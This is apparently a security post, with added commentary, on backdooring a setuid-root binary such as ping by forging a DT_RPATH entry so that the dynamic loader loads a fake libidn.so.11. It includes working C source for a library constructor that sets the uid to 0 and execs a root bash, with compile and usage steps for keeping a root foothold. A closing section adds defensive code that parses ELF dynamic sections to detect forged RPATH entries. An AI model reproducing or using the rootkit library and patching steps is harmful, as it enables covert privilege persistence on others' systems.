https://drive.google.com/file/d/0B1UY25xXM3UkbWtiM0FSdkRwQnM/view?usp=sharing
* Overview
This code demonstrates how to insert our own library search path into an ELF binary's DT_RPATH entry, so that when the binary is executed the dynamic loader resolves one of its DT_NEEDED libraries to our library instead of the real one. Used against a setuid-root binary this yields a root shell: for setuid programs glibc's ld.so ignores LD_LIBRARY_PATH and refuses $ORIGIN expansion, but it still honours a DT_RPATH embedded in the executable itself. Patching the binary requires write access to it (i.e. root), so this is a way to keep a root foothold on a machine, not a way to obtain root from scratch.
* Compile
1) hack_RPATH64.c
Use this tool to add an RPATH entry (a DT_RPATH tag in the .dynamic section) to a 64-bit ELF binary.
make hack_RPATH64
2) rootkit.c
This library goes in the current directory. It gets loaded because the target's existing DT_NEEDED entry names libidn.so.11 (ping links against it) and the forged RPATH makes ld.so search that directory before the system library directories, so our copy is picked up instead of the real libidn.
gcc -shared rootkit.c -o libidn.so.11 -fPIC
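As an added illustration (my own code, not the post's rootkit.c, whose source is only in the linked archive), this is the shape such a library takes: a constructor that ld.so runs before the host program's main(), which raises the real uid to 0 and execs a shell. The should_escalate guard and the choice of bash -p are my additions, not something the post describes.

```c
/* Added example standing in for the post's rootkit.c (not its code).
 * Built as libidn.so.11 and reached through the forged RPATH, the library
 * is mapped by ld.so, which then runs this constructor before ping's main(). */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Only act when the process really runs setuid-root: real uid is an ordinary
 * user while the effective uid is 0. Loaded into any other process (a test
 * binary, a non-setuid copy of ping) the library then does nothing. */
int should_escalate(uid_t ruid, uid_t euid)
{
    return euid == 0 && ruid != 0;
}

__attribute__((constructor))
static void spawn_root_shell(void)
{
    if (!should_escalate(getuid(), geteuid()))
        return;
    /* With euid 0, setgid(0)/setuid(0) set real, effective and saved ids to 0.
     * Without this bash would drop back to the real uid at startup; -p is kept
     * as a belt-and-braces measure for shells that still check. */
    if (setgid(0) != 0 || setuid(0) != 0)
        return;
    execl("/bin/bash", "bash", "-p", (char *)NULL);
    perror("execl");   /* only reached if bash could not be started */
}
```

Two loader-side caveats. The constructor runs only if the binary gets that far: ping was linked against the real libidn, so if the target uses immediate binding (-z now / BIND_NOW, the default on hardened distributions) ld.so fails with a symbol lookup error for the missing libidn functions before any constructor runs, and the fake library then has to export those symbols as well. And setuid(0) is what makes the shell usable: with only the effective uid raised, bash resets its euid to the real uid unless started with -p.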
* Usage:
1) get a root bash
- As root, copy a setuid-root binary to /home/passion/DT_RPATH, for example ping (a copy made by an ordinary user would be owned by that user and lose the setuid bit), and put the compiled libidn.so.11 in the same directory
- Add the RPATH entry to ./ping
cd /home/passion/DT_RPATH
./hack_RPATH64 ./ping
readelf -d ./ping   # the dynamic section should now show an (RPATH) entry with the forged path
- Check that ./ping is still owned by root and still has the setuid bit (ls -l ./ping)
2) log in as the unprivileged user "passion"
- ./ping   # ld.so searches the forged RPATH first, loads our libidn.so.11, and we get a root shell.
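The readelf -d step above is where the forged entry becomes visible. As an added example (my code, not the post's hack_RPATH64.c), here is the same check done programmatically, together with the test that actually matters for a setuid binary: whether any RPATH directory is writable by an ordinary user. The program walks the .dynamic section of an ELF64 file the way readelf does and reports DT_NEEDED, DT_RPATH and DT_RUNPATH; run with no argument it parses a constructed in-memory image whose strings (libidn.so.11, /home/passion/DT_RPATH) are taken from this post and are not a real ping.

```c
/* Added example, not the post's hack_RPATH64.c: list DT_NEEDED/DT_RPATH/DT_RUNPATH of
 * an ELF64 file and count RPATH dirs the current user can write to. Usage: ./a.out [binary] */
#include <elf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

struct dyninfo {
    const char *needed[16];
    int nneeded;
    const char *rpath, *runpath;   /* NULL when the tag is absent */
};

/* Find .dynamic through the section headers (as readelf -d does) and collect the string
 * tags. 0 on success, -1 if img is not a well-formed ELF64; pointers in *out stay inside img. */
int parse_dynamic(const uint8_t *img, size_t len, struct dyninfo *out)
{
    memset(out, 0, sizeof *out);
    const Elf64_Ehdr *eh = (const Elf64_Ehdr *)img;
    if (len < sizeof *eh || memcmp(eh->e_ident, ELFMAG, SELFMAG) ||
        eh->e_ident[EI_CLASS] != ELFCLASS64 || eh->e_shoff == 0 || eh->e_shoff > len ||
        (size_t)eh->e_shnum * sizeof(Elf64_Shdr) > len - eh->e_shoff) return -1;
    const Elf64_Shdr *sh = (const Elf64_Shdr *)(img + eh->e_shoff);
    for (int i = 0; i < eh->e_shnum; i++) {
        if (sh[i].sh_type != SHT_DYNAMIC || sh[i].sh_link >= eh->e_shnum) continue;
        const Elf64_Shdr *ss = &sh[sh[i].sh_link];                            /* .dynstr */
        if (sh[i].sh_offset > len || sh[i].sh_size > len - sh[i].sh_offset ||
            ss->sh_offset > len || ss->sh_size > len - ss->sh_offset) return -1;
        const char *dynstr = (const char *)(img + ss->sh_offset);
        const Elf64_Dyn *dyn = (const Elf64_Dyn *)(img + sh[i].sh_offset);
        for (size_t j = 0; j < sh[i].sh_size / sizeof *dyn && dyn[j].d_tag != DT_NULL; j++) {
            Elf64_Sxword tag = dyn[j].d_tag;
            if (tag != DT_NEEDED && tag != DT_RPATH && tag != DT_RUNPATH) continue;
            Elf64_Xword off = dyn[j].d_un.d_val;                     /* offset into .dynstr */
            if (off >= ss->sh_size || !memchr(dynstr + off, 0, ss->sh_size - off)) return -1;
            if (tag == DT_RPATH) out->rpath = dynstr + off;
            else if (tag == DT_RUNPATH) out->runpath = dynstr + off;
            else if (out->nneeded < 16) out->needed[out->nneeded++] = dynstr + off;
        }
        return 0;
    }
    return -1;   /* no .dynamic: static binary, or section headers stripped */
}

/* Count colon-separated components the current user may write to. ld.so reads an empty
 * component as "./" (glibc fillin_rpath), so it is checked as ".". NULL counts as 0. */
int count_writable_dirs(const char *paths)
{
    int n = 0;
    for (const char *p = paths, *end; p; p = end ? end + 1 : NULL) {
        end = strchr(p, ':');
        size_t l = end ? (size_t)(end - p) : strlen(p);
        char dir[4096];
        if (l >= sizeof dir) l = sizeof dir - 1;
        memcpy(dir, p, l); dir[l] = '\0';
        if (access(l ? dir : ".", W_OK) == 0) n++;
    }
    return n;
}

/* Constructed sample, not a real binary: .dynstr/.dynamic as ping's would look with DT_RPATH
 * added. Layout ehdr@0 dynstr@64 dynamic@128 shdrs@208; dynstr offsets 1, 14, 24 (see below). */
const uint8_t *sample_image(size_t *len)
{
    static uint64_t buf[50];                                          /* 400 bytes, 8-aligned */
    static const char dynstr[] = "\0libidn.so.11\0libc.so.6\0/home/passion/DT_RPATH";
    const Elf64_Dyn d[] = {{DT_NEEDED, {1}}, {DT_NEEDED, {14}}, {DT_RPATH, {24}}, {DT_DEBUG, {0}}, {DT_NULL, {0}}};
    uint8_t *img = (uint8_t *)buf;
    Elf64_Ehdr *eh = (Elf64_Ehdr *)img;
    Elf64_Shdr *sh = (Elf64_Shdr *)(img + 208);
    memset(img, 0, sizeof buf);
    memcpy(eh->e_ident, ELFMAG, SELFMAG);
    eh->e_ident[EI_CLASS] = ELFCLASS64; eh->e_ident[EI_DATA] = ELFDATA2LSB; eh->e_ident[EI_VERSION] = EV_CURRENT;
    eh->e_type = ET_EXEC; eh->e_machine = EM_X86_64; eh->e_shoff = 208; eh->e_shnum = 3;
    memcpy(img + 64, dynstr, sizeof dynstr);
    memcpy(img + 128, d, sizeof d);
    sh[1].sh_type = SHT_STRTAB;  sh[1].sh_offset = 64;  sh[1].sh_size = sizeof dynstr;
    sh[2].sh_type = SHT_DYNAMIC; sh[2].sh_offset = 128; sh[2].sh_size = sizeof d; sh[2].sh_link = 1;
    *len = 400; return img;
}

int main(int argc, char **argv)
{
    size_t len = 0; uint8_t *file = NULL; const uint8_t *img = NULL; long n = 0;
    FILE *f = argc > 1 ? fopen(argv[1], "rb") : NULL;                /* read the whole binary */
    if (f && fseek(f, 0, SEEK_END) == 0 && (n = ftell(f)) > 0 && (file = malloc(n)) &&
        fseek(f, 0, SEEK_SET) == 0 && fread(file, 1, n, f) == (size_t)n) { img = file; len = n; }
    if (f) fclose(f); else if (argc < 2) img = sample_image(&len);
    struct dyninfo di;
    if (!img || parse_dynamic(img, len, &di) != 0) { fputs("cannot parse\n", stderr); return 1; }
    for (int i = 0; i < di.nneeded; i++) printf("NEEDED  %s\n", di.needed[i]);
    if (di.rpath) printf("RPATH   %s  (%d writable)\n", di.rpath, count_writable_dirs(di.rpath));
    if (di.runpath) printf("RUNPATH %s  (%d writable)\n", di.runpath, count_writable_dirs(di.runpath));
    free(file);
    return 0;
}
```

Run it over every setuid binary (find / -perm -4000 -type f) to spot a patched one: a distro ping normally carries no RPATH at all, so any (RPATH) entry, let alone one into a user-writable directory, is the thing to look at. Like readelf -d the parser relies on section headers, so a binary whose section headers were stripped needs the PT_DYNAMIC program header instead. ld.so searches DT_RPATH before LD_LIBRARY_PATH and the system directories, which is why the forged path wins; DT_RUNPATH, which modern linkers emit instead of DT_RPATH, is searched after LD_LIBRARY_PATH.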